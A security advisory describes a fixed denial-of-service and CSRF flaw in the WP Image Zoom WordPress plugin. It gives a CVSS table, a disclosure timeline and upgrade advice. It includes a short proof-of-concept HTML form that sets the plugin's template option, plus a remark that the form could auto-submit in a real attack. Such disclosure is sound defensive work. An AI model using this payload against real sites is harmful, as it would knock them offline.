WP Image Zoom allows anybody to cause denial of service

Vulnerability

Last revised: April 10, 2018

WP Image Zoom includes an AJAX action which allows any logged in user to set any option to “1”. This means that any logged in user can cause a denial of service for all WP URLs by setting the “template” option to “1”.

Additionally, this vulnerability can be triggered via CSRF meaning that anybody who can convince a logged in user to follow a link can also cause a denial of service.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	7.5 High
Vector	Network
Complexity	Low
Authentication	Single
Confidentiality	None
Integrity	Partial
Availability	Complete

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Press the submit button in the following HTML snippet:

<form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
 <input type="text" name="action" value="iz_dismiss">
 <input type="text" name="option" value="template">
 <input type="submit">
</form>

This will set the template option to 1 causing fatal errors for any WordPress URL.

In a real attack the form could be set to autosubmit so no user interaction is required except for following a link.

Advisory timeline

2018-03-20: Discovered
2018-03-27: Reported to author via https://www.silkypress.com/contact/
2018-03-27: Vendor responded
2018-03-29: Vendor reported issue fixed in version 1.24
2018-04-10: Advisory published
2018-06-07: CVE requested
2018-06-23: CVE assigned

Mitigation/further actions

Upgrade to version 1.24 or later.

dxw advisories

Advisory: